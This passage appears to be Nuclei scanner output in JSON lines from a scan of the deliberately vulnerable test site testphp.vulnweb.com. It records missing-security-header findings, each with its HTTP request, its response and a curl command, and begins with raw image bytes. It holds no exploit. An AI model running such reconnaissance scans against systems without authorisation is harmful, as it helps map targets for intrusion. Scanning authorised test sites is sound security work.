\\ufffd\\ufffdǛ\\ufffd\\\\\\u0011VF\\ufffd};\\ufffd'\\ufffd\\ufffdL*@ۈV4O\\ufffdߑu\\ufffd\\ufffdp1\\ufffd\\ufffdُ\\u0018E\\ufffdhw\\u003e\\ufffd\\ufffd?]\\u003c\\ufffd\\ufffd\\u001fM\\u0010\\ufffdL\\ufffdf\\ufffdSa\\u000cƌ\\n\\u0000}t|_\\ufffd\\ufffd\\ufffd15\\u0000F\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\u0015\\u000fSD\\u001d^\\ufffd\\\\\\ufffd\\ufffd\\t(\\u001cX\\ufffdj\\ufffd:\\ufffd:\\ufffd\\u000c\\ufffd\\u0018\\ufffdy\\u0007]\\ufffd\\u001fm#\\ufffd\\ufffd`\\ufffd\\ufffdS#*\\u0008\\ufffd@f\\u000e\\ufffd\\u0015_sΪ\\u001dy^L\\ufffd\\ufffd\\t\\ufffd1Ŵ\\ufffd\\ufffd\\ufffdk\\ufffd7|7\\u0015|}E\\ufffd\\ufffd\\ufffd#3\\ufffd#29\\ufffdr8`{Q\\ufffd΢\\u000f\\ufffd!\\ufffdF$e۸\\ufffd\\u0018Ճ\\ufffd\\ufffd\\u003cw\\u0014k\\ufffd\\ufffduFN\\u0013㱓\\r\\ufffdѰ\\ufffd\\ufffd\\u001d\\ufffd\\u0000\\ufffd·l\\ufffdU\\u0026\\ufffdr=\\ufffd\\ufffdGϿ\\ufffd\\ufffd\\ufffdͦ\\ufffd4\\ufffd:\\ufffd9\\ufffdC\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffd\\u0015Z\\u0012|\\ufffd\\\\\\ufffd$\\ufffd\\u0016b\\u0015\\u0000bI \\n\\u001c\\ufffd\\u0000\\u0000\\ufffd\\ufffd^uT\\ufffd\\ufffdf!\\ufffd\\ufffd!\\ufffdV\\ufffd\\ufffdUoɮkށ5\\ufffd\\u001e\\ufffd\\t\\ufffdW\\ufffd3(,\\ufffd~`\\ufffdF\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk,\\ufffd\\ufffd\\ufffdo4\\ufffd\\ufffdr80\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd7Uλ\\ufffd\\ufffd\\ufffd\\u0015\\u0001\\ufffd\\ufffd;\\ufffd\\u001et\\ufffdى\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0008\\u003eڂ^E\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd@\\u001as\\ufffd=ŘC\\ufffd\\u0001\\ufffd(\\ufffdp\\ufffd˘ϐ\\ufffd\\ufffd\\ufffd)\\ufffd\\ufffd\\\"\\ufffd\\u003c\\ufffd0\\ufffdz\\ufffd7ȡ\\ufffd\\ufffd\\ufffd\\ufffdyI\\u0004b\\ufffd\\ufffd{\\ufffd\\ufffd8c\\ufffd\\ufffds=%A\\ufffd\\u0026h\\ufffdu\\ufffd-\\ufffd\\u0001\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffdf\\ufffd\\u0011\\ufffd\\ufffd\\ufffdk\\ufffd#\\ufffd\\ufffd\\u0008\\u001d\\ufffd滊҈D\\ufffd\\ufffdz\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffdcP\\u0007a\\ufffdx\\u001fm\\u003c3Y\\ufffd\\ufffdg\\ufffd%\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\\"a,\\ufffd|\\ufffd\\ufffd\\ufffdk\\u001e\\u0001\\ufffdkM\\ufffd\\u0015h\\u000eݴ\\ufffd\\u0019UG}^z\\ufffd\\u0011r\\ufffd(\\u001e\\ufffdk\\ufffd\\ufffd\\ufffd\\u0014N\\u0026f\\ufffd\\ufffd\\ufffd4p\\ufffd\\ufffd\\ufffd\\ufffd`\\u003c\\ufffd\\ufffd.\\u000f\\ufffdRf\\u000b\\u001cr\\ufffd\\ufffdLE\\ufffd\\ufffd\\u0004w\\ufffda\\ufffd\\u0013;\\ufffdd\\ufffd$X\\ufffd\\u0018\\ufffdo\\ufffd($\\ufffd\\ufffd\\ufffdA\\u001e\\ufffd\\ufffd\\ufffd\\\\\\ufffd\\ufffd\\ufffdt\\ufffd\\ufffd[\\ufffd\\ufffdq'P\\ufffd\\u0014/,\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd\\u001a\\u001e_\\ufffdq\\ufffd\\ufffd#74I`E-{\\ufffd?\\ufffd\\ufffdF\\ufffd\\u0011|?\\ufffd\\ufffd\\u001eJL\\u0015\\u000c\\ufffd\\ufffd.@!d\\u0003\\ufffd\\u0006\\ufffd\\ufffd\\ufffdoO\\ufffd\\ufffdme\\ufffd\\ufffdt\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd8 \\ufffd\\u00005\\ufffd\\u003e\\ufffd\\ufffd~u\\u0001c\\ufffdB\\ufffd93\\ufffd\\ufffd\\ufffd\\ufffdpS\\u0000\\u0019\\u0008\\ufffd\\ufffd\\ufffd\\u0003nu䊢;P\\ufffd\\ufffd\\ufffd\\ufffdS'\\u0026N\\ufffd\\ufffd2\\\"\\ufffd\\ufffd\\ufffd\\u0006W\\ufffd\\ufffdG\\ufffd\\u003c\\ufffd\\ufffd\\u0011‚ǎIZ\\ufffdl?\\ufffd\\ufffd\\u000f\\u001b\\u0010\\ufffd\\u0000\\u0005YV\\ufffdc\\u000cB\\ufffd\\u0015\\ufffd\\ufffd\\u001am\\ufffdӠ\\ufffd%H\\ufffdDU\\ufffdÿ\\ufffd\\ufffd\\ufffd\\r$\\ufffddր\\ufffdD\\ufffd\\ufffdbu\\u0003\\ufffd,\\ufffd2\\u001c\\ufffd\\ufffd匨X\\ufffd\\ufffd\\ufffd!,\\ufffd\\u0018\\ufffd\\u0017d\\u0011\\\\\\ufffd\\u001ac\\ufffd\\ufffd\\u001b\\ufffd\\ufffd\\ufffd\\ufffddIe\\ufffd(\\u001fP\\ufffdIT\\ufffdqUVŅ\\ufffd\\u003c\\u000f\\ufffd:\\ufffdE\\n\\ufffd8\\ufffdH\\ufffdx\\ufffdUm+\\ufffd\\u0006֟\\ufffd\\ufffd\\ufffdp\\ufffd_P\\ufffd'\\ufffd#\\ufffd\\ufffd\\u001a\\u0007*e\\ufffd9\\u0004r\\u0015\\u000e\\ufffd[k0\\ufffd\\ufffd}\\ufffdP~\\ufffdL\\ufffdV'\\u00042\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffdA\\ufffdv\\ufffd\\ufffdH}x\\ufffd\\ufffd\\u0013_\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0019L\\ufffdB\\ufffd\\ufffdX\\ufffd\\ufffdB\\u0014\\u0005RV@K\\u0012\\ufffdKpG\\ufffd\\u0000\\u000bDrh\\ufffd\\ufffd3ʞN\\ufffdxZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0006\\ufffd\\ufffdVyY\\ufffdo\\ufffdw\\u0010\\u0016\\ufffd\\ufffd\\u001a\\ufffd\\u0011L\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0005\\u0004\\ufffds\\ufffd\\ufffds\\ufffd\\u003e\\ufffdy\\ufffdm6\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffdK0\\ufffd\\\"X\\ufffd\\ufffd[Q\\ufffd\\u0016\\u000bE\\ufffd$\\ufffd#q\\ufffdg\\ufffd\\u001ck±\\ufffdĦ\\ufffd*\\ufffdһ\\ufffd\\u000cy#m\\u000e,\\u0000\\u00007\\ufffd6\\u0001\\ufffd\\ufffd}#\\ufffd\\u001c\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd6ڀ\\ufffd\\ufffd\\ufffdFGs\\ufffd\\ufffd8\\u001bZ\\ufffdZڋ\\ufffdt\\ufffd\\u0017\\ufffd,\\ufffd\\u001a\\ufffd\\ufffdz\\ufffdWj7\\ufffd\\ufffd\\ufffdUR\\ufffd\\ufffds@\\ufffd\\u000e\\u0015\\u0012\\u000c\\ufffdA\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffd\\u0013,H;\\ufffd%\\n\\ufffd\\ufffd\\u0016,_o\\ufffd\\ufffd\\ufffd^\\ufffd\\ufffd]\\ufffd0\\ufffdG\\ufffd6\\ufffd\\ufffd\\u0014\\ufffdn\\ufffd\\u001d\\ufffd\\u0000:\\ufffd*_\\\\\\ufffd\\ufffd1y\\ufffd|\\ufffd\\ufffd\\u0004aM\\ufffdv\\ufffdF\\ufffdB\\ufffd_j\\ufffd\\ufffd(\\ufffd\\u0006\\ufffd\\ufffdo^\\ufffd\\ufffd\\ufffd\\\\\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd23\\u001e\\ufffde\\ufffd\\u001d\\u0013p\\u0004\\ufffd\\u0004\\ufffd\\u0007\\ufffd\\u003c\\u000f\\ufffd\\u001a\\ufffd3\\ufffd$\\u0003\\ufffd\\ufffd\\ufffd\\u0007\\ufffd\\ufffdm\\u0005\\ufffd\\u001cKF\\ufffd\\u003e羝c\\u0015\\u0015ڵ\\ufffd\\ufffd\\ufffd'\\u0013\\u001e\\ufffd\\ufffdv\\\\\\ufffd\\ufffd \\ufffd͖\\ufffd䊾\\ufffd(\\ufffd\\u003c\\ufffd\\ufffd8}\\u000e\\u0012\\ufffdg\\u0026m\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffd\\ufffd4Ǒx\\ufffdN\\u0015/]\\ufffds\\ufffd\\ufffd\\u000e\\ufffdohN/O\\ufffdy1!n9e\\ufffd\\ufffd7\\ufffd\\u0018\\ufffd(\\ufffd\\u0006\\ufffdǕ}\\ufffd\\ufffda\\u000c\\ufffd\\ufffd\\ufffd\\ufffd\\u0004\\ufffd\\ufffda\\n\\u0001㶎\\ufffd@ \\u001f\\ufffd\\ufffd\\ufffdƍ\\ufffd\\ufffd\\u0007Τ\\ufffd\\ufffd\\ufffd\\u0017\\ufffd\\u0010\\u0000@\\ufffd18\\ufffd\\ufffd\\u001d\\u0017\\u001bX\\u001e\\ufffdBH\\\\c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd܂4B\\u001e~\\ufffd\\\\։\\u0004\\ufffd\\ufffd?MP\\ufffd\\ufffdI\\r\\ufffd\\ufffdݹ\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdI\\ufffd wfc\\ufffd\\u0015\\u0014Y\\ufffd\\ufffd@\\u0000{\\u0001\\ufffd\\ufffd4ר.Yp\\ufffd4E\\n#\\ufffdV$|\\ufffd\\u001bo4l]\\u001e;\\ufffd\\ufffd\\ufffd̼KT2wT\\ufffd\\ufffd\\u0013\\ufffd\\u001b?1\\ufffd\\ufffd\\ufffd\\u001e\\u0007\\ufffdIuR\\u003c+7\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd!{\\u0010O\\ufffd\\u0013\\u000e\\ufffd3Y\\u0016D\\ufffdcb\\u0003\\ufffda[\\ufffd\\u0018X\\u0006\\ufffd\\ufffd\\u0001\\ufffdڹ\\u00122[a\\ufffd\\u0007\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\\\,eґAU!@\\ufffd߸\\u001c\\ufffd\\u00007ި{k\\u000f\\ufffd\\ufffd}Y\\ufffd\\ufffd\\ufffd\\ufffd٢\\ufffd\\u000c\\u0018ϰ|\\u000f\\ufffd\\ufffd_\\u000f┃\\u001f\\ufffdފ%\\rD_'r\\ufffd\\ufffd\\u0004W\\u0017ߛ\\u0000\\ufffd1\\ufffd\\u0000\\u001bu\\u0015\\ufffd̝\\ufffd(\\ufffd\\ufffd]\\ufffdT\\u0016\\ufffdl\\ufffd\\ufffdLn\\ufffd\\ufffd\\u0015Wܒöc#v8\\ufffd9m\\\\\\ufffd\\ufffd\\u001bQ\\ufffdBֈ\\ufffd]\\ufffd\\ufffd^\\ufffd9\\u0001\\ufffd.ϕ\\ufffd\\ufffd\\ufffdN\\ufffdş\\ufffd\\ufffdן\\ufffd\\ufffd\\ufffdl\\ufffd\\u0026\\ufffd\\ufffd\\ufffd\\ufffdp72\\ufffd\\ufffdܮ\\t\\u001f\\ufffdT\\ufffd\\ufffdn;\\\\M\\u0005\\u0026\\ufffder\\ufffd\\u0006\\ufffdE\\ufffdn\\ufffdQ\\u003cv\\u003cX44:\\u0002Ɖ\\ufffd{\\ufffd\\ufffdh\\ufffd@G\\ufffd\\ufffdU\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffd1\\ufffdO\\ufffdY\\ufffdu\\ufffd\\ufffd0ر\\u0016p7\\u001d\\ufffd\\ufffd\\ufffd\\u0000^O\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdWƂ\\ufffd,\\ufffdN\\ufffdN\\ufffd\\ufffd\\u0000I\\ufffdL\\ufffd:\\ufffd%\\t\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd\\t\\ufffd\\u000cL\\ufffd\\ufffd\\ufffdP\\ufffd\\u001d\\u0016\\u001c\\ufffd#\\r1eC`m\\u000bb\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffdǁE\\u0026\\u0026zez\\ufffd\\ufffd\\ufffd\\u0018(P\\ufffd[\\ufffd\\u001b6\\ufffd7F\\ufffd\\ufffd\\ufffd\\ufffdp5~\\u0014\\ufffd\\ufffd\\u0001FR=\\ufffd\\ufffd|`\\rk\\ufffdT\\ufffd\\ufffde\\ufffdh\\ufffd\\u003e/\\ufffdH\\ufffd}Y\\\\\\ufffd\\ufffdqH\\ufffdG\\ufffd\\u0001~/p\\ufffdo\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\ufffd\\ufffd\\u0000\\ufffd\\u001a)V4\\ufffd\\u0004J\\ufffd\\u000e\\ufffd\\ufffd\\u0018\\ufffdE\\n\\u003c\\ufffd\\ufffd^\\ufffdֆ\\u0008\\ufffd\\u0003\\ufffd\\u001d\\u000c \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd̯~O L\\ufffd?W\\ufffd\\ufffd#\\ufffdVV\\ufffdf\\ufffddJ2P;\\ufffd\\ufffd;\\ufffdU\\n\\ufffdY\\ufffd\\ufffd\\ufffd:\\ufffdx\\u001d\\u003e6\\ufffd7\\ufffd-\\ufffd\\ufffdV2ށ,F\\ufffd7\\u000f\\ufffd\\ufffdأ}\\ufffdj#\\ufffdR;\\r\\\\\\ufffd\\u003e\\u0016]\\ufffd1\\ufffdp\\u003c\\ufffd\\ufffd\\u003e\\ufffdw\\ufffd\\ufffd1\\u000c\\u001f\\u0015\\ufffd\\ufffd4%\\u0000\\ufffd\\u001e\\ufffdV(\\ufffd\\ufffd捀A\\u0006\\ufffd\\ufffd{\\ufffd\\ufffd\\ufffd\\u001f\\ufffdP\\ufffd\\u000e\\u003eT\\ufffd\\u0015\\ufffdr\\u0002:\\ufffdb\\ufffd\\u00057`\\u001e\\t\\ufffd\\ufffd\\ufffd\\ufffdӡb\\ufffd\\ufffd#GUz\\ufffd\\u000e\\ufffdh\\n\\u0003m\\ufffd\\u0001\\ufffd@d\\ufffd\\u001b\\ufffd4\\u00016\\ufffd\\ufffdx\\ufffd\\u003cJ\\u0002\\ufffdc\\ufffd)a`\\u001a\\u0026\\ufffdw\\ufffd\\ufffd\\t\\u0001\\ufffd\\ufffd\\ufffd\\ufffd~ M\\ufffdn\\ufffdu\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd{\\u001a\\u0004\\ufffd{\\ufffd\\ufffd\\ufffdLq\\ufffd\\ufffd,\\ufffd\\ufffd\\\\\\ufffd\\t\\ufffd\\ufffdSI\\ufffdS{\\u001b\\ufffdG\\ufffd\\u000f\\ufffd\\ufffd\\ufffd|;!\\ufffd\\u0010\\ufffd\\ufffd\\ufffd\\u0026r.\\ufffd*\\ufffdT[\\u000e~m\\ufffdh_\\ufffd\\ufffdF\\ufffd\\u001d\\u0003\\ufffd\\ufffdVwM\\ufffd\\ufffd9\\ufffdI\\ufffd4\\ufffd\\ufffdƕ\\u0003!\\u003cw#m\\ufffd\\ufffd}\\ufffd\\ufffd\\u0016\\u000eO\\\"@\\ufffdzϞ\\ufffd\\u003cp#3\\ufffd\\u0000\\ufffd)=\\\\\\ufffd\\tP\\ufffd\\u0000\\ufffd\\ufffd[\\ufffd\\ufffd\\ufffd0\\ufffd!\\u000c\\ufffd\\ufffd#J״\\ufffd`S\\ufffd\\u003c|\\ufffd\\ufffdW\\ufffd1\\ufffdۜ\\ufffdH\\\",h*\\ufffd:S)}\\ufffd\\ufffdu\\ufffdb\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffdD#\\u0001{\\ufffd\\u001a\\ufffd\\ufffdB\\ufffd\\u0006\\ufffd;\\ufffd\\ufffd4X\\ufffd\\u000b~M\\u0002k\\ufffd\\u000e\\ufffd?O\\ufffd\\ufffd\\ufffd6@BѻF\\ufffd\\u001c:\\ufffd5`\\ufffdD\\u001a\\ufffd\\ufffd\\ufffd\\u0000m\\u0005\\ufffd\\n\\ufffdH\\ufffd\\ufffd\\u0003w\\u0002\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdbj\\\\\\ufffd\\u0007\\ufffd\\ufffdt\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdx\\ufffdZ3HСD%\\ufffd\\ufffd\\ufffd\\ufffdT\\ufffd\\u0017B\\ufffd\\u001e\\ufffd\\ufffdv\\ufffd\\ufffd\\u0002\\ufffd\\ufffd[\\ufffdB\\u003ecc\\ufffdu\\ufffdP\\ufffd|\\ufffd\\ufffd\\ufffd˃d\\ufffd\\ufffd\\ufffd\\ufffd\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\u0016@;\\u001et\\ufffd\\ufffd\\ufffdI q\\ufffd\\ufffd\\ufffd\\u001c|\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffdCL\\ufffd\\ufffd1\\ufffd%@\\ufffdB\\ufffd\\ufffd\\u0008\\u0004\\ufffd5\\ufffd\\u001b\\u0017V\\u003c\\ufffd8\\ufffd\\ufffd#\\ufffdQ\\u001364\\ufffdE#Fɹ\\u0018\\ufffd\\ufffd\\ufffdk\\u000e\\u003c\\u0010H#\\ufffd$jΒޤ~\\ufffd\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdZ\\ufffd:\\u000f\\u001d'5\\ufffd\\ufffd\\ufffd\\ufffdzs;\\ufffdӤ\\ufffd\\ufffd6\\ufffd\\r\\u0015$i\\ufffd⤠nE?q\\ufffd\\ufffd\\ufffdsK\\u0019h\\u0018\\ufffd( \\ufffd5d]_﫺fw\\ufffdL\\u0019\\u0000$\\ufffdk\\ufffd\\u0000G\\ufffd\\\\\\ufffd\\ufffdЧO\\ufffd\\ufffdm\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffdH\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffdx\\u0004]\\ufffd}\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\ufffd$0ώ\\ufffd\\ufffd\\u0010\\ufffdB7314\\u0015Tr\\ufffd\\ufffd\\u0000\\ufffd\\ufffdc\\ufffdj\\ufffd\\ufffd\\ufffd\\u001aJ\\ufffd]A\\u0017tG\\ufffd\\u0007L\\ufffd\\ufffd\\ufffd\\ufffds\\ufffd嶰g\\ufffd8\\ufffd\\ufffdW\\u001f\\\"F\\ufffd\\\\\\t\\u0013\\ufffdS\\ufffd\\ufffd_c\\ufffd:\\ufffd\\ufffd\\ufffdGYy\\ufffd\\u0002z\\ufffd\\ufffd\\u0011;U\\ufffd\\ufffd\\ufffd\\u0001I\\ufffd\\ufffd]\\ufffdw\\ufffdگ\\ufffdd\\ufffdt\\ufffd\\ufffdXs\\u001d\\ufffdfW\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\ufffdx\\u0004X\\ufffd/\\ufffdW\\ufffd\\ufffd\\ufffd\\ufffdD\\u0005\\u0015\\ufffdC7\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffdp+β]\\u001b\\ufffd\\u003cl\\ufffd}Rޒ\\u000b\\ufffdC]\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffd@\\ufffdbN\\ufffd\\\"20e\\\"\\ufffd\\u0006\\ufffd\\u001a\\ufffd \\ufffd\\u0014\\ufffdT\\ufffd\\ufffd\\u0011\\ufffd\\u003e8\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd\\ufffd\\u0010N\\ufffd;\\ufffd\\u001a\\ufffdb\\u0007ƺQgV\\ufffd\\ufffd^5\\ufffde\\ufffdB\\u0004\\ufffd\\ufffdȠ\\u001e5\\ufffd\\ufffd$\\ufffdԱ\\ufffd؟I\\ufffd\\u0012\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffd_\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd~\\ufffd\\u0018Ѫ\\ufffd\\ufffdҜh\\ufffd\\ufffd\\ufffd1\\ufffdA\\u0000\\u0013\\ufffd\\u001bA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd_\\ufffdU\\ufffdcV\\ufffd\\ufffd\\u0007\\ufffdm_\\ufffd\\u00188S\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdSSUn\\u001b\\ufffd\\ufffdp\\u003eOβ\\ufffd\\u0001\\ufffd\\ufffd\\ufffd3\\ufffd\\u000fU\\ufffd\\ufffd\\ufffd\\ufffd\\u0008a\\ufffd\\\\\\ufffd\\u0000\\ufffdSSV\\u003eE\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd,u\\u0006\\ufffd\\ufffd\\ufffd:\\ufffd\\u001cO\\u0003\\ufffd\\u00048B\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdӜef}$\\ufffd\\u0006=e\\ufffd\\tf˗\\ufffd\\ufffdZ\\ufffdm\\ufffd\\ufffd\\ufffdε\\ufffd\\ufffd\\ufffd\\u001a\\ufffd\\ufffd)\\ufffd\\u0010\\\\1a\\u0002\\u001f\\u0012\\ufffd;k\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdՌX\\ufffdez\\ufffd\\u0004\\u0011u\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=F\\u0006\\ufffd,\\u001d\\ufffd\\ufffd\\u0004\\ufffd菅sr'N\\ufffd,\\ufffd10亠\\ufffdTy\\ufffdۏmMM$y\\ufffd\\u0000='[oW\\ufffd\\ufffd3W\\ufffd\\ufffdT\\ufffd\\ufffd}'\\u001f+$ \\ufffd\\ufffd$( p\\ufffd{\\ufffd5\\ufffd\\ufffd\\ufffdښ\\ufffda\\ufffdr\\ufffd\\u0026\\u0018\\ufffdͫ\\ufffd󩩮\\u000ba\\u0013\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:03.070333115Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/pictures/4.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin/1\",\"path\":\"/cgi-bin/1\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin/1\",\"request\":\"GET /cgi-bin/1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on this server.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:03.402285949Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51' 'http://testphp.vulnweb.com/cgi-bin/1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"path\":\"/pictures/3.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"request\":\"GET /pictures/3.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3725\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-e8d\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , 